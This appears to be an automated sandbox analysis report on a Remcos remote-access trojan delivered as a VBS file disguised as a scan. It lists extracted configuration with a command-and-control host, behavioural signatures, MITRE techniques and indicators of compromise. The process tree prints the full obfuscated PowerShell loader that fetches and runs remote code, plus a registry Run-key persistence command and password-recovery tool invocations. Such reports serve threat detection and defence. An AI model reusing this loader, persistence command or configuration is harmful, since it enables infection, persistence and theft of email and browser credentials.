remcos | b6a4e38c07cc735bb3830ad6dd11c86e224c748d5285f35d5006a578851bcb72

Analysis

max time kernel
135s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21/10/2024, 11:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

scan_20241021094905.vbs
Size

25KB
MD5

f0b294ee638bb4d395cd75451e71a6b6
SHA1

8bf584b1806091823b343cd6b49f369258a44d23
SHA256

a5eb3dd84918b7e65d9d2193775aeda26375c600c089dad2eecb9259c7b0dcc2
SHA512

a1c9bbadff52083f88316059598eee4d5d45902d1bf7ba85ce625451195e6721246a2f758b458fa960f24a2f3a0dbf6b7506adc5039f1b197536d3b83711e3cc
SSDEEP

384:XrCiFq74ZyPbHapGgkpLVjbUErWxljm7Gd8y:Xez74ZyPwXoV+xVm6d8y

Score

10^/10

remcos 520 collection discovery persistence rat

Malware Config

Extracted

Family

remcos

Botnet

520

renajazinw.duckdns.org:53848

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
Windeep.exe
copy_folder
AppDir
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-N1P6UN
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detected Nirsoft tools 3 IoCs

Free utilities often used by attackers which can steal passwords, product keys, etc.

resource	yara_rule
behavioral2/memory/1860-84-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral2/memory/5052-82-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral2/memory/1156-81-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

NirSoft MailPassView 1 IoCs

Password recovery tool for various email clients

resource	yara_rule
behavioral2/memory/1860-84-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/memory/5052-82-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Blocklisted process makes network request 44 IoCs

flow	pid	Process
2	2736	WScript.exe
12	4508	powershell.exe
36	1544	msiexec.exe
38	1544	msiexec.exe
40	1544	msiexec.exe
44	1544	msiexec.exe
45	1544	msiexec.exe
47	1544	msiexec.exe
54	1544	msiexec.exe
61	1544	msiexec.exe
63	1544	msiexec.exe
64	1544	msiexec.exe
65	1544	msiexec.exe
66	1544	msiexec.exe
67	1544	msiexec.exe
68	1544	msiexec.exe
69	1544	msiexec.exe
70	1544	msiexec.exe
71	1544	msiexec.exe
72	1544	msiexec.exe
73	1544	msiexec.exe
74	1544	msiexec.exe
75	1544	msiexec.exe
76	1544	msiexec.exe
77	1544	msiexec.exe
78	1544	msiexec.exe
79	1544	msiexec.exe
80	1544	msiexec.exe
81	1544	msiexec.exe
85	1544	msiexec.exe
87	1544	msiexec.exe
88	1544	msiexec.exe
89	1544	msiexec.exe
92	1544	msiexec.exe
93	1544	msiexec.exe
94	1544	msiexec.exe
95	1544	msiexec.exe
96	1544	msiexec.exe
97	1544	msiexec.exe
98	1544	msiexec.exe
99	1544	msiexec.exe
101	1544	msiexec.exe
116	1544	msiexec.exe
117	1544	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	msiexec.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Leavy = "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\\Software\\Silently\\').lyspen;%Ankomststationen% ($Ridendes)"	reg.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\msiexec.exe	msiexec.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1544	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
2032	powershell.exe
1544	msiexec.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1544 set thread context of 5052	1544	msiexec.exe	110
PID 1544 set thread context of 1860	1544	msiexec.exe	111
PID 1544 set thread context of 1156	1544	msiexec.exe	113

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4844	ping.exe
4508	powershell.exe
2032	powershell.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	msiexec.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
1748	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4844	ping.exe

Suspicious behavior: EnumeratesProcesses 11 IoCs

pid	Process
4508	powershell.exe
4508	powershell.exe
2032	powershell.exe
2032	powershell.exe
2032	powershell.exe
1156	msiexec.exe
1156	msiexec.exe
5052	msiexec.exe
5052	msiexec.exe
5052	msiexec.exe
5052	msiexec.exe

Suspicious behavior: MapViewOfSection 5 IoCs

pid	Process
2032	powershell.exe
1544	msiexec.exe
1544	msiexec.exe
1544	msiexec.exe
1544	msiexec.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	1156	msiexec.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1544	msiexec.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2736 wrote to memory of 4844	2736	WScript.exe	85
PID 2736 wrote to memory of 4844	2736	WScript.exe	85
PID 2736 wrote to memory of 4508	2736	WScript.exe	87
PID 2736 wrote to memory of 4508	2736	WScript.exe	87
PID 2032 wrote to memory of 1544	2032	powershell.exe	101
PID 2032 wrote to memory of 1544	2032	powershell.exe	101
PID 2032 wrote to memory of 1544	2032	powershell.exe	101
PID 2032 wrote to memory of 1544	2032	powershell.exe	101
PID 1544 wrote to memory of 4980	1544	msiexec.exe	102
PID 1544 wrote to memory of 4980	1544	msiexec.exe	102
PID 1544 wrote to memory of 4980	1544	msiexec.exe	102
PID 4980 wrote to memory of 1748	4980	cmd.exe	104
PID 4980 wrote to memory of 1748	4980	cmd.exe	104
PID 4980 wrote to memory of 1748	4980	cmd.exe	104
PID 1544 wrote to memory of 5052	1544	msiexec.exe	110
PID 1544 wrote to memory of 5052	1544	msiexec.exe	110
PID 1544 wrote to memory of 5052	1544	msiexec.exe	110
PID 1544 wrote to memory of 5052	1544	msiexec.exe	110
PID 1544 wrote to memory of 1860	1544	msiexec.exe	111
PID 1544 wrote to memory of 1860	1544	msiexec.exe	111
PID 1544 wrote to memory of 1860	1544	msiexec.exe	111
PID 1544 wrote to memory of 1860	1544	msiexec.exe	111
PID 1544 wrote to memory of 3588	1544	msiexec.exe	112
PID 1544 wrote to memory of 3588	1544	msiexec.exe	112
PID 1544 wrote to memory of 3588	1544	msiexec.exe	112
PID 1544 wrote to memory of 1156	1544	msiexec.exe	113
PID 1544 wrote to memory of 1156	1544	msiexec.exe	113
PID 1544 wrote to memory of 1156	1544	msiexec.exe	113
PID 1544 wrote to memory of 1156	1544	msiexec.exe	113
PID 1544 wrote to memory of 3084	1544	msiexec.exe	125
PID 1544 wrote to memory of 3084	1544	msiexec.exe	125
PID 1544 wrote to memory of 3084	1544	msiexec.exe	125

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\scan_20241021094905.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2736
- C:\Windows\System32\ping.exe
  ping gormezl_6777.6777.6777.677e
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Runs ping.exe
  PID:4844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
  2⤵
  - Blocklisted process makes network request
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4508

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unappropriation smaamnterne Slaaenbrrene Forsgsarbejders Heiau #>;$Gaardvagters='Skvalderkaal';<#Elicits Tppes Istandsttelses Slavicist Phylarch #>;$Unhypnotizables=$Urocentrumet204+$host.UI; function Nrigstes($Epiphanizingsochronized70){If ($Unhypnotizables) {$Kwanza++;}$Dapifer=$Leishmanic+$Epiphanizingsochronized70.'Length'-$Kwanza; for( $Epiphanizing=4;$Epiphanizing -lt $Dapifer;$Epiphanizing+=5){$Crawlerize=$Epiphanizing;$Castrato+=$Epiphanizingsochronized70[$Epiphanizing];$Epiphanizingndianize='Fljtekedels';}$Castrato;}function Depending($Pyotr){ & ($Tudsefisks33) ($Pyotr);}$Stvknappen=Nrigstes 'Was MAnt.oDekazRetriSubclM.tilTetraHvii/ ran ';$Stvknappen+=Nrigstes ' Nd,5Fi,m. um0Kile Mi n(OverWSk,miNympn ashd FedoForfwFo.ssUna Cr mNAn iTHand Tild1Hith0Sard.Bela0U tr;Sene BrugWBut iblo nare 6Tred4Fo.l; Fir NedsxPhre6,nde4 Un,;Udfo Salmr J nvSpu : ini1I co3 End1Jagt.Llen0 Rep)Revi yntGd wneMillcansgkAviao Fly/ Agn2 ud 0Hand1Rici0Spr,0Dagb1 F s0 Uds1La.d troF JaciHjtirNedgeOpstfTarvoP.eixJoke/ Ag 1Cl i3 Kl,1Futh.Rigs0Kin. ';$Rrfabrikkernes=Nrigstes 'DenauS ans UnmeOprer oeb-ForlATr,oG UviE ov NPyreTOrys ';$Hucksterage=Nrigstes ' SmrhKaertBonut FilpKomms ab:Feld/Be y/Natat biboThyrtTanto L fpIndrlH.ana ArusSyvatPean. U ecUdvaos rem P o/Un.rrMedf5 Arb/Ar,tC SuroInfrsPrygtNonaiLgnafAng,oMi lrLukkmF rp.Spe oArchc Antx Tel ';$Oxeye=Nrigstes ' Omd>Bund ';$Tudsefisks33=Nrigstes ' AbrI PreERivaXKon ';$Tilplantet='Deutonephron';$Uncaps='\Cobblerism.Ace';Depending (Nrigstes 'Anat$ ProgS,efL Belo MazB ,nwAUns LObje: axiv nnESvumr TabDChinSDebaL,dlaIFanfGAfghsAf,eI Kopnsa,uDpeleEC urTte k=Anth$UnpieSolsn SmuvBipi:UndeaPreaPBo.sp .miDUfora IntT PolA Phr+ Bot$ OffuNonvNBlacC KolaS appMa pS ni ');Depending (Nrigstes ',ump$ U pgBemyLDepoO TurBProsaforelKas : pinL CaniMummmVandINut tDag aAntilAu,o=Perg$ Prih Af uTroccKrisKAerosPrjsTa beEKvadRK geA pingGr,ne Im.. Hjes.lleP FacLSlaniHag TSte (chiv$SlouoInkaxDul.EAffaYBl.eeTele)Anga ');Depending (Nrigstes ' kid[C.ntn nscENudeT Fyk. PicsUd leEmneRTaktvNo eiS.waC CamESpaspInteOKeywiI denfolktVignmmostAPi fNhistaDetaGCanaED srRG,la]Succ:Wa,h:wilfSA juEOmdeCKilluSjllrGramI WhiTVendyFordPTopsrFerrOS.ectDorioSubuc S eoEf eL Wa, Stol=Fode Bend[ ConNBryse.efet yvt.StatsEnlaepoddC VuruFinrr SvmiD cktp ery Si P FirrDistO RecTWimpo semCImpeoWindlGudsTCag YM topA,toePrel]Envi: agl:UdfrtRevilMatrsBack1 Viv2S mo ');$Hucksterage=$Limital[0];$Anmis=(Nrigstes ' lal$ GrugDem.l UnoOVertbTrykaSup LBusl:ExtaoGambvBasiE ParRHepaHSupeAPortESamgNLustG .xiTScot= Na.n TokePolyWSupe-NikoOSek BMat JThioEalpiCIntrT cay RevasScriYDents Bo TkonsEantimK.as..rhvnTetre palTPass.plotWSupeEDispBO prC FloLBiliI TydES,rgNP,nttLydi ');Depending ($Anmis);Depending (Nrigstes 'Valu$AlcoORakhvSaddemiserPla,h raya onseSem.nSoutg oultTand.Haa H bsceSupea usd TypeIndsrclumsUn o[H ma$ UniRAbelr igifSalgaConcbJeblrSkrli ,enk ca kRegeeDevirDocunBacoe StasVe d]disc=Kass$UnomSHavot O,fvCo,nkiso nJen aF,rrp KvspDayte PhynDisc ');$Deprecierendes=Nrigstes 'rode$Ch lOG rdvArmleDygtrDir hA.buaFotoeFru.nVaflgEdgitMods.PrimDSemioO muwBisknAffel SinoChroarus.d S oFSdariTupalKi geinfi( ppl$Br.cH etu GabcSev k Epis Efft gnoeBagarAlvoa orgNonaeNytt, ec$ ,onNSmykoSig nEy,bi O tlParalSat.uExotsGeheiDrkov NedeGala5Patr5Cimm) ig ';$Nonillusive55=$Verdsligsindet;Depending (Nrigstes 'Tr c$SyngGdoorlSkmmo B lBBronAConiLUphe:Re ipKoglIp lyvBestOfremtThu,ADis.lKlubL AdgYVel =Atom(g.amTfo eeEgepS HunTRefl-AnthPr.deARepatHimmH T,a Inta$AldrnTokso .rinCen,IAndeL yselSub UMunisSteviIndkV UlvEF re5frim5Ge,d)U,st ');while (!$Pivotally) {Depending (Nrigstes ' Hel$Misrg Ry.lCataoDistb CamaRefelGros:JobbNDebaaPlantSuppiPa ev Sane pla= res$ SuztS oarPhysuSt geAf.e ') ;Depending $Deprecierendes;Depending (Nrigstes ' NunsTilsTLactaViviR WritArbi-BerbsOxytLU ateka aeSta.pThai Skov4Teno ');Depending (Nrigstes 'Poli$ LaugRedeLTapio R dB Tjeap nsLPr.p:Bussp pisiFutivEp soCy.ttAntoaSk,mLDia.lG ldyTe e=arbe( ,rutPr.fELostS Sn tMuti-orolpBe oAMar.TOpvoh Gra Oppu$InswN OrdOIm.rn.rerIGaddLF asl.idduUtilsStroIElekvincie Par5Amat5 Dou)Tigl ') ;Depending (Nrigstes 'Pati$GaffgL haLD adoBelab PsyA aslThom:AsprmInexaEdder Tamk V sEoutwdGallSLyknp Outl TaeAo ttD An SAvere NetRMungnS,xieTr.cSBeec=I,tr$V zlg GrsLFgteONavlBB usAArkolimp :Mopsk GunlStopL ignIWandN,swagTot SDipn+Impo+Drik% rv$ KnolMiryiL,ttMBookIVowmT SpaAdeenl S,a. riCUnvaokil u WitN u eTKons ') ;$Hucksterage=$Limital[$Markedspladsernes];}$torteret=334742;$Nykalket=29680;Depending (Nrigstes ' s x$.liegBilll HiloDri Bparaa MjdlHolm:PindS Clut DafO,rneK ChuEdjrvrLokaFDr ayFrs R ForE BesNPeriECon.SBer Disa=Capr angContEV.nlTSalp-RigscSn,dO dslN TilTTat,eHackn eratOroc Nav $KonkNAlycOL.san akiIStiglB,aaLFeriUCuinsKwa IFyldvToriEScre5Stro5Leve ');Depending (Nrigstes ' Rot$ UnigLivvlLi so Holb MapaAparl num: S,rS Pactc ckoDirkgH ndyGeno Swee=Oper Vale[ReflS lisyFalss istAfste laumEff .T ldC FlloVa enKa.ivManiediharPlett H o]lign:Omis:buskF Gstr Nuco P lm,oliBkiosa .vrsSklme S v6Trkn4ChutSForutpioxr AphiTilsn TelgPens(Inde$AphaSNeurtVomtoimplkDo seSpegrUdbofRepay Indr PreeFlabnFor.eBr,gs opu)Stev ');Depending (Nrigstes 'Afma$ vlnGSorelcle O Ar,BMyttALevelQuon:stenmMarga nmoT omme .irrInt,INon AHy nlafstiVa sSAntiMyrkesUnde8.lai0Luk A no=Urin Tali[ReflsStruyHydrsNysgtRegnEPlsemhead.TydeTBebaEAutoXPa.kt Ken.S,mmEComonDanscUncaOOpraD StoiCro nS miGDish] F r:Tids:EmbiaIn eSspircpr fiD cuiAnti.TactgBo.oe akvTChins rit TokRQu ri FjenRegigPrec(Thri$Hy.rSCh nt Si,OBr dG T myKrse) Wal ');Depending (Nrigstes 'Blaa$ BengSaphlOmniO UngB eriaMilllRegd:OtocPRandlDagga Blos ilsTatlaICuscd R moL pamUnt eMikr=Meld$E,ucm.ncaADepuTUd.bENykbRUdleITsara Smrl,ekoiR tms JanMKaadsB ed8Prot0Meiz.StilsDrosUT neb .risfaltTL njrAfriI fg nOut gDeg ( Byg$FjertSpi OPub RSuccTkorrESankRSeroeLiquTSta ,Saf $ CosN,adeYkmpekW,isASt vLSprnkNaziEF.stt Enc)c rs ');Depending $Plastidome;"
1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Drops file in System32 directory
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1544
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4980
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Leavy" /t REG_EXPAND_SZ /d "%Ankomststationen% -windowstyle 1 $Ridendes=(gp -Path 'HKCU:\Software\Silently\').lyspen;%Ankomststationen% ($Ridendes)"
      4⤵
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry key
      PID:1748
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\csuktonhegqjnhcvcllrelisqisuytn"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5052
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\enadlhybaoiwpnyzuvxshquirobdreelzj"
    3⤵
    - Accesses Microsoft Outlook accounts
    - System Location Discovery: System Language Discovery
    PID:1860
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\opnnmz"
    3⤵
    PID:3588
- - C:\Windows\SysWOW64\msiexec.exe
    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\opnnmz"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1156
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\lshhfezxqpwcqwdurkqwytgobbxfxiaeiq.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:3084

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

